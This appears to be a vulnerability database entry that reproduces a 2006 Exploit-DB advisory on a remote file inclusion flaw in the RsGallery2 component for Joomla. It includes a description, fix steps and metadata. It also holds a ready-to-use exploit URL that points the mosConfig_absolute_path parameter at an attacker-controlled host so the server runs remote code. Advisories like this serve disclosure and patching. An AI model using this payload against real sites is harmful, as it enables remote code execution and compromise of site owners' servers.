RsGallery2 for Joomla

vendor:

RsGallery2

by:

marriottvn

7,5

CVSS

HIGH

Remote Code Execution

CWE

Product Name: RsGallery2

Affected Version From: 1.11.2

Affected Version To: 1.11.2

Patch Exists: YES

Related CWE: N/A

CPE: a:rsdev.nl:rsgallery2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Joomla

2006

A vulnerability exists in RsGallery2 for Joomla, which allows a remote attacker to execute arbitrary code. This is due to the application failing to properly sanitize user-supplied input to the 'mosConfig_absolute_path' parameter in the 'rsgallery.html.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing an arbitrary file path to the vulnerable script. This will cause the application to include and execute the arbitrary file.

Mitigation:

Declare variabel $mosConfig_absolute_path or add into the top function: defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

Source

Exploit-DB raw data:

RsGallery2 for Joomla
---------------------------------------------------------------------------

Discovered: marriottvn
Remote : Yes
Level : High

---------------------------------------------------------------------------
Affected software description :

Application : RsGallery2
version : latest version [ 1.11.2 ]
Description: component for joomla
URL: http://rsdev.nl

----------------------------------------------------------------------------

Vulnerable file :

rsgallery2.html.php

----------------------------------------------------------------------------

Exploit:

http://[sitepath]/[joomlapath]/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://[attacker]

----------------------------------------------------------------------------

Fix:

1.Declare variabel $mosConfig_absolute_path

or

2.Add into the top function:

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

----------------------------------------------------------------------------

Contact:

Nick: marriottvn
E-mail: i_love_lonely_girl[at]yahoo.com
Web: http://vnsecurity.com

Greetz to: VnRekcah

# milw0rm.com [2006-06-28]